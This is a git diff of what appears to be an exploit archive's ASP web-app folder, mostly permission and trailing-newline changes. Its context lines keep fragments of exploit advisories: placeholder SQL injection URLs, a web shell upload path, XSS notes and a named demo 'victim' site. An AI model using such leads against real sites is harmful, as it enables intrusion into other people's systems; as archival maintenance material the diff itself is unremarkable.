b/platforms/asp/webapps/10686.txt @@ -70,4 +70,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZvA -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10713.txt b/platforms/asp/webapps/10713.txt old mode 100755 new mode 100644 index a1e16f0d1..5b17de362 --- a/platforms/asp/webapps/10713.txt +++ b/platforms/asp/webapps/10713.txt @@ -71,4 +71,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10767.txt b/platforms/asp/webapps/10767.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10770.txt b/platforms/asp/webapps/10770.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10771.txt b/platforms/asp/webapps/10771.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10772.txt b/platforms/asp/webapps/10772.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10773.txt b/platforms/asp/webapps/10773.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10774.txt b/platforms/asp/webapps/10774.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10775.txt b/platforms/asp/webapps/10775.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10776.txt b/platforms/asp/webapps/10776.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10777.txt b/platforms/asp/webapps/10777.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10778.txt b/platforms/asp/webapps/10778.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10780.txt b/platforms/asp/webapps/10780.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10794.txt b/platforms/asp/webapps/10794.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10795.txt b/platforms/asp/webapps/10795.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10796.txt b/platforms/asp/webapps/10796.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10819.txt b/platforms/asp/webapps/10819.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10823.txt b/platforms/asp/webapps/10823.txt old mode 100755 new mode 100644 index 8946ce9a8..879a7c26c --- a/platforms/asp/webapps/10823.txt +++ b/platforms/asp/webapps/10823.txt @@ -70,4 +70,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10883.txt b/platforms/asp/webapps/10883.txt old mode 100755 new mode 100644 index 922264159..0d4ef2c94 --- a/platforms/asp/webapps/10883.txt +++ b/platforms/asp/webapps/10883.txt @@ -66,4 +66,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng - Turk'uz Varmi Otesi? -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10884.txt b/platforms/asp/webapps/10884.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10903.txt b/platforms/asp/webapps/10903.txt old mode 100755 new mode 100644 index b13fb1504..0056a24ea --- a/platforms/asp/webapps/10903.txt +++ b/platforms/asp/webapps/10903.txt @@ -72,4 +72,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10940.txt b/platforms/asp/webapps/10940.txt old mode 100755 new mode 100644 index e2fb586fa..98c0000dc --- a/platforms/asp/webapps/10940.txt +++ b/platforms/asp/webapps/10940.txt @@ -70,4 +70,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/10955.txt b/platforms/asp/webapps/10955.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/10972.txt b/platforms/asp/webapps/10972.txt old mode 100755 new mode 100644 index bfca387a4..9de2892a0 --- a/platforms/asp/webapps/10972.txt +++ b/platforms/asp/webapps/10972.txt @@ -72,4 +72,4 @@ Bizim Asiret: eXceptioN,CodeInside,CristaL1o,Hack3ra,eXtReMe,By_HKC,TerrorZveng -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/11005.txt b/platforms/asp/webapps/11005.txt old mode 100755 new mode 100644 index a7567f485..9182dca07 --- a/platforms/asp/webapps/11005.txt +++ b/platforms/asp/webapps/11005.txt @@ -70,4 +70,4 @@ Ar-ge.Org :Cyber_945,D3xer -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/11008.txt b/platforms/asp/webapps/11008.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11015.txt b/platforms/asp/webapps/11015.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11016.txt b/platforms/asp/webapps/11016.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11018.txt b/platforms/asp/webapps/11018.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11023.txt b/platforms/asp/webapps/11023.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11096.txt b/platforms/asp/webapps/11096.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11097.txt b/platforms/asp/webapps/11097.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11098.txt b/platforms/asp/webapps/11098.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1112.txt b/platforms/asp/webapps/1112.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11134.txt b/platforms/asp/webapps/11134.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11212.txt b/platforms/asp/webapps/11212.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11295.txt b/platforms/asp/webapps/11295.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11310.txt b/platforms/asp/webapps/11310.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11348.txt b/platforms/asp/webapps/11348.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11361.txt b/platforms/asp/webapps/11361.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11369.txt b/platforms/asp/webapps/11369.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11414.txt b/platforms/asp/webapps/11414.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11555.txt b/platforms/asp/webapps/11555.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11589.txt b/platforms/asp/webapps/11589.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11606.txt b/platforms/asp/webapps/11606.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11611.txt b/platforms/asp/webapps/11611.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/11931.txt b/platforms/asp/webapps/11931.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12029.txt b/platforms/asp/webapps/12029.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12100.txt b/platforms/asp/webapps/12100.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12197.txt b/platforms/asp/webapps/12197.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12199.txt b/platforms/asp/webapps/12199.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12218.txt b/platforms/asp/webapps/12218.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12329.txt b/platforms/asp/webapps/12329.txt old mode 100755 new mode 100644 index d1737b357..d5cb6470b --- a/platforms/asp/webapps/12329.txt +++ b/platforms/asp/webapps/12329.txt @@ -70,4 +70,4 @@ CoreLabs, the research center of Core Security Technologies, is charged with ant Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com. 12. Disclaimer -The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. \ No newline at end of file +The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. \ No newline at end of file diff --git a/platforms/asp/webapps/12424.txt b/platforms/asp/webapps/12424.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12464.txt b/platforms/asp/webapps/12464.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12471.txt b/platforms/asp/webapps/12471.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12478.txt b/platforms/asp/webapps/12478.txt old mode 100755 new mode 100644 index f24323222..90d1e1401 --- a/platforms/asp/webapps/12478.txt +++ b/platforms/asp/webapps/12478.txt @@ -35,4 +35,4 @@ Author: LionTurk <- Dandirik Scriptler Kullanmayýn. -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/1252.htm b/platforms/asp/webapps/1252.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12526.txt b/platforms/asp/webapps/12526.txt old mode 100755 new mode 100644 index b503415b2..aeef3c195 --- a/platforms/asp/webapps/12526.txt +++ b/platforms/asp/webapps/12526.txt @@ -29,4 +29,4 @@ *"""""""""""""""""""" ** Greetz to : ALLAH ** All Members of http://www.DZ4All.cOm/Cc -** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & ..... \ No newline at end of file +** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & ..... \ No newline at end of file diff --git a/platforms/asp/webapps/12571.txt b/platforms/asp/webapps/12571.txt old mode 100755 new mode 100644 index 6cfe03a10..75fecebcc --- a/platforms/asp/webapps/12571.txt +++ b/platforms/asp/webapps/12571.txt @@ -36,4 +36,4 @@ Dağları deviriverdin üstüme hiç çekinmedin Ben bu şehirde bir daha da sabah görmedim Günaydınlar olmadı günler aymadı sensiz ........ -------------------------------------------------------------------------------------------- \ No newline at end of file +------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/asp/webapps/12606.txt b/platforms/asp/webapps/12606.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12664.txt b/platforms/asp/webapps/12664.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12672.txt b/platforms/asp/webapps/12672.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12693.txt b/platforms/asp/webapps/12693.txt old mode 100755 new mode 100644 index a43f17912..abc0c619e --- a/platforms/asp/webapps/12693.txt +++ b/platforms/asp/webapps/12693.txt @@ -26,4 +26,4 @@ ** Greetz to : ALLAH ** All Members of http://www.DZ4All.cOm/Cc ** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & T O X ! N £ & n2n & -*********************************************************** \ No newline at end of file +*********************************************************** \ No newline at end of file diff --git a/platforms/asp/webapps/12700.txt b/platforms/asp/webapps/12700.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12701.txt b/platforms/asp/webapps/12701.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12734.txt b/platforms/asp/webapps/12734.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12833.txt b/platforms/asp/webapps/12833.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/12841.txt b/platforms/asp/webapps/12841.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13788.txt b/platforms/asp/webapps/13788.txt old mode 100755 new mode 100644 index 99bbe4dbe..a735f38be --- a/platforms/asp/webapps/13788.txt +++ b/platforms/asp/webapps/13788.txt @@ -27,4 +27,4 @@ DEMO URL: ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/asp/webapps/13789.txt b/platforms/asp/webapps/13789.txt old mode 100755 new mode 100644 index ca8a6b391..95cf96549 --- a/platforms/asp/webapps/13789.txt +++ b/platforms/asp/webapps/13789.txt @@ -27,4 +27,4 @@ DEMO URL: ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/asp/webapps/13790.txt b/platforms/asp/webapps/13790.txt old mode 100755 new mode 100644 index 7680368ee..ff0787e4d --- a/platforms/asp/webapps/13790.txt +++ b/platforms/asp/webapps/13790.txt @@ -27,4 +27,4 @@ DEMO URL: ############################################################################################################### # 0day no more -# Sid3^effects \ No newline at end of file +# Sid3^effects \ No newline at end of file diff --git a/platforms/asp/webapps/13793.txt b/platforms/asp/webapps/13793.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13814.txt b/platforms/asp/webapps/13814.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13840.txt b/platforms/asp/webapps/13840.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13841.txt b/platforms/asp/webapps/13841.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13842.txt b/platforms/asp/webapps/13842.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13843.txt b/platforms/asp/webapps/13843.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13846.txt b/platforms/asp/webapps/13846.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13859.txt b/platforms/asp/webapps/13859.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13860.txt b/platforms/asp/webapps/13860.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13861.txt b/platforms/asp/webapps/13861.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13880.txt b/platforms/asp/webapps/13880.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13882.txt b/platforms/asp/webapps/13882.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13883.txt b/platforms/asp/webapps/13883.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13884.txt b/platforms/asp/webapps/13884.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13885.txt b/platforms/asp/webapps/13885.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13886.txt b/platforms/asp/webapps/13886.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13891.html b/platforms/asp/webapps/13891.html old mode 100755 new mode 100644 index c4aafbca6..a1dd8738c --- a/platforms/asp/webapps/13891.html +++ b/platforms/asp/webapps/13891.html @@ -32,4 +32,4 @@ Sex Crew : IMHATIMI.ORG ~ MecTruy ~ Dr.Ly0n ~ Noxy ~ FreWaL -################################################################################## \ No newline at end of file +################################################################################## \ No newline at end of file diff --git a/platforms/asp/webapps/13902.txt b/platforms/asp/webapps/13902.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1399.txt b/platforms/asp/webapps/1399.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13990.txt b/platforms/asp/webapps/13990.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/13995.txt b/platforms/asp/webapps/13995.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14149.txt b/platforms/asp/webapps/14149.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14155.txt b/platforms/asp/webapps/14155.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14168.txt b/platforms/asp/webapps/14168.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14169.txt b/platforms/asp/webapps/14169.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1418.txt b/platforms/asp/webapps/1418.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14192.txt b/platforms/asp/webapps/14192.txt old mode 100755 new mode 100644 index 923127988..98990072d --- a/platforms/asp/webapps/14192.txt +++ b/platforms/asp/webapps/14192.txt @@ -17,5 +17,4 @@ Thank You For Your Perfect Web Site. http://server/main.asp?id=5945&grp=[SQL Injection] -[~]######################################### FinisH :D #############################################[~] - \ No newline at end of file +[~]######################################### FinisH :D #############################################[~] \ No newline at end of file diff --git a/platforms/asp/webapps/14281.txt b/platforms/asp/webapps/14281.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14283.txt b/platforms/asp/webapps/14283.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14284.txt b/platforms/asp/webapps/14284.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14401.txt b/platforms/asp/webapps/14401.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14419.txt b/platforms/asp/webapps/14419.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14420.txt b/platforms/asp/webapps/14420.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14421.txt b/platforms/asp/webapps/14421.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14461.txt b/platforms/asp/webapps/14461.txt old mode 100755 new mode 100644 index d97919b34..22193a65e --- a/platforms/asp/webapps/14461.txt +++ b/platforms/asp/webapps/14461.txt @@ -31,4 +31,4 @@ and all www.worldhackerz.com Member =================================================== -# Turkish P0wer \ No newline at end of file +# Turkish P0wer \ No newline at end of file diff --git a/platforms/asp/webapps/14704.txt b/platforms/asp/webapps/14704.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14709.txt b/platforms/asp/webapps/14709.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14821.txt b/platforms/asp/webapps/14821.txt old mode 100755 new mode 100644 index 9c14f5ef1..2ff6f9f60 --- a/platforms/asp/webapps/14821.txt +++ b/platforms/asp/webapps/14821.txt @@ -16,5 +16,4 @@ admin page : http://site.com/[path]/admin.asp Victem : http://www.etoshop.com/demo/pcstore --------------------------------------------------------- -######################################################### - \ No newline at end of file +######################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/14870.txt b/platforms/asp/webapps/14870.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14879.txt b/platforms/asp/webapps/14879.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14898.txt b/platforms/asp/webapps/14898.txt old mode 100755 new mode 100644 index 21b4cd03e..abd959c3c --- a/platforms/asp/webapps/14898.txt +++ b/platforms/asp/webapps/14898.txt @@ -122,5 +122,4 @@ Persistent XSS Vulnerabilities: entity.Title = txtTitle_E.Text.Trim(); -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/14908.txt b/platforms/asp/webapps/14908.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14913.txt b/platforms/asp/webapps/14913.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14914.txt b/platforms/asp/webapps/14914.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14919.txt b/platforms/asp/webapps/14919.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14943.txt b/platforms/asp/webapps/14943.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14954.txt b/platforms/asp/webapps/14954.txt old mode 100755 new mode 100644 index fedf299f5..8bb9ae426 --- a/platforms/asp/webapps/14954.txt +++ b/platforms/asp/webapps/14954.txt @@ -64,5 +64,4 @@ PoC: shell.aspx ---> http://Example.com/downloads/uploads/2010_7_25_shell.aspx Note that : the value 2010_7_25 is the exact date of server. -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/14969.txt b/platforms/asp/webapps/14969.txt old mode 100755 new mode 100644 index aa40ee628..0689e0c8d --- a/platforms/asp/webapps/14969.txt +++ b/platforms/asp/webapps/14969.txt @@ -65,5 +65,4 @@ Description : Which the Password was encrypted by SHA algorithm using .../lib/sha256.asp file. -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/14980.txt b/platforms/asp/webapps/14980.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/14991.txt b/platforms/asp/webapps/14991.txt old mode 100755 new mode 100644 index b65c472c6..273d193f8 --- a/platforms/asp/webapps/14991.txt +++ b/platforms/asp/webapps/14991.txt @@ -35,5 +35,4 @@ Description : http://Example.com/Images/ -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/14999.txt b/platforms/asp/webapps/14999.txt old mode 100755 new mode 100644 index 0d026ffb2..88a8faff4 --- a/platforms/asp/webapps/14999.txt +++ b/platforms/asp/webapps/14999.txt @@ -73,5 +73,4 @@ Persistent XSS: } -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/15018.txt b/platforms/asp/webapps/15018.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15044.txt b/platforms/asp/webapps/15044.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15058.html b/platforms/asp/webapps/15058.html old mode 100755 new mode 100644 index ce2e6862d..9a074a0a3 --- a/platforms/asp/webapps/15058.html +++ b/platforms/asp/webapps/15058.html @@ -82,5 +82,4 @@ This page remove Admins Role in VWD-CMS. -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/15067.txt b/platforms/asp/webapps/15067.txt old mode 100755 new mode 100644 index 928debb15..6cc418d0c --- a/platforms/asp/webapps/15067.txt +++ b/platforms/asp/webapps/15067.txt @@ -178,5 +178,4 @@ Persistent XSS and XSRF: --------------------------------------------------------------------------------------- -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/15078.txt b/platforms/asp/webapps/15078.txt old mode 100755 new mode 100644 index 44b79b6a8..43d32c301 --- a/platforms/asp/webapps/15078.txt +++ b/platforms/asp/webapps/15078.txt @@ -182,5 +182,4 @@ This page uploads a file -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/15106.txt b/platforms/asp/webapps/15106.txt old mode 100755 new mode 100644 index 5ad2db0dd..8143256df --- a/platforms/asp/webapps/15106.txt +++ b/platforms/asp/webapps/15106.txt @@ -60,5 +60,4 @@ Persistent XSS in admin section: http://Example.com/SearchResults.aspx?q={} -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/15118.txt b/platforms/asp/webapps/15118.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15124.txt b/platforms/asp/webapps/15124.txt old mode 100755 new mode 100644 index 6255699b9..d0fd6869b --- a/platforms/asp/webapps/15124.txt +++ b/platforms/asp/webapps/15124.txt @@ -41,5 +41,4 @@ Description : and so on. -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/15139.txt b/platforms/asp/webapps/15139.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15160.txt b/platforms/asp/webapps/15160.txt old mode 100755 new mode 100644 index bfbf3035c..21e725485 --- a/platforms/asp/webapps/15160.txt +++ b/platforms/asp/webapps/15160.txt @@ -159,5 +159,4 @@ This page uploads a file with "xml" extension -=========================================================================================== - \ No newline at end of file +=========================================================================================== \ No newline at end of file diff --git a/platforms/asp/webapps/15185.txt b/platforms/asp/webapps/15185.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15189.txt b/platforms/asp/webapps/15189.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15191.txt b/platforms/asp/webapps/15191.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15218.txt b/platforms/asp/webapps/15218.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15230.txt b/platforms/asp/webapps/15230.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15270.txt b/platforms/asp/webapps/15270.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1529.htm b/platforms/asp/webapps/1529.htm old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15382.txt b/platforms/asp/webapps/15382.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15395.txt b/platforms/asp/webapps/15395.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15396.txt b/platforms/asp/webapps/15396.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15397.txt b/platforms/asp/webapps/15397.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15398.txt b/platforms/asp/webapps/15398.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15399.txt b/platforms/asp/webapps/15399.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15448.txt b/platforms/asp/webapps/15448.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15497.txt b/platforms/asp/webapps/15497.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/1550.txt b/platforms/asp/webapps/1550.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15544.txt b/platforms/asp/webapps/15544.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15551.txt b/platforms/asp/webapps/15551.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15552.txt b/platforms/asp/webapps/15552.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15553.txt b/platforms/asp/webapps/15553.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15554.txt b/platforms/asp/webapps/15554.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15563.txt b/platforms/asp/webapps/15563.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15597.txt b/platforms/asp/webapps/15597.txt old mode 100755 new mode 100644 index 30c52a58e..7f8fa9617 --- a/platforms/asp/webapps/15597.txt +++ b/platforms/asp/webapps/15597.txt @@ -46,4 +46,4 @@ Greetz : HUrr!c4nE , H-SK33PY , Cair3x , B3hz4d , Skitt3r , M4hd1 BHG : Net.Edit0r ~ Darkcoder ~ AmIr_Magic ~ keracker -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/asp/webapps/15627.html b/platforms/asp/webapps/15627.html old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15629.txt b/platforms/asp/webapps/15629.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15653.txt b/platforms/asp/webapps/15653.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15661.txt b/platforms/asp/webapps/15661.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15665.txt b/platforms/asp/webapps/15665.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15673.txt b/platforms/asp/webapps/15673.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15677.txt b/platforms/asp/webapps/15677.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15678.txt b/platforms/asp/webapps/15678.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15679.txt b/platforms/asp/webapps/15679.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15680.txt b/platforms/asp/webapps/15680.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15681.txt b/platforms/asp/webapps/15681.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15682.txt b/platforms/asp/webapps/15682.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15683.txt b/platforms/asp/webapps/15683.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15686.txt b/platforms/asp/webapps/15686.txt old mode 100755 new mode 100644 index 97857bc53..a4981d4bc --- a/platforms/asp/webapps/15686.txt +++ b/platforms/asp/webapps/15686.txt @@ -24,4 +24,4 @@ Code: ASP 2.0 & VBScript SQL Injection: http://server/ECO.asp?ECO_ID=[Code] -######################################################################################## \ No newline at end of file +######################################################################################## \ No newline at end of file diff --git a/platforms/asp/webapps/15687.txt b/platforms/asp/webapps/15687.txt old mode 100755 new mode 100644 index 534c06162..df6e398a9 --- a/platforms/asp/webapps/15687.txt +++ b/platforms/asp/webapps/15687.txt @@ -24,4 +24,4 @@ Sell e-books, e-zines, Flash, digital arts, ringtones... Code: ASP 2.0 & VBScrip SQL Injection: http://server/shoppingcart.asp?d=[Code] -######################################################################################## \ No newline at end of file +######################################################################################## \ No newline at end of file diff --git a/platforms/asp/webapps/15688.txt b/platforms/asp/webapps/15688.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15690.txt b/platforms/asp/webapps/15690.txt old mode 100755 new mode 100644 diff --git a/platforms/asp/webapps/15703.txt b/platforms/asp/webapps/15703.txt old mode 100755 new mode 100644 index a865dc1ca..111676cde --- a/platforms/asp/webapps/15703.txt +++ b/platforms/asp/webapps/15703.txt @@ -33,7 +33,4 @@ Personal # KinG,Bl4ckl0rd,Turk_server -# Special Thanks : Farzad_Ho,R3dMind,rAbiN_hoOd,Falcon - - - \ No newline at end of file +# Special Thanks : 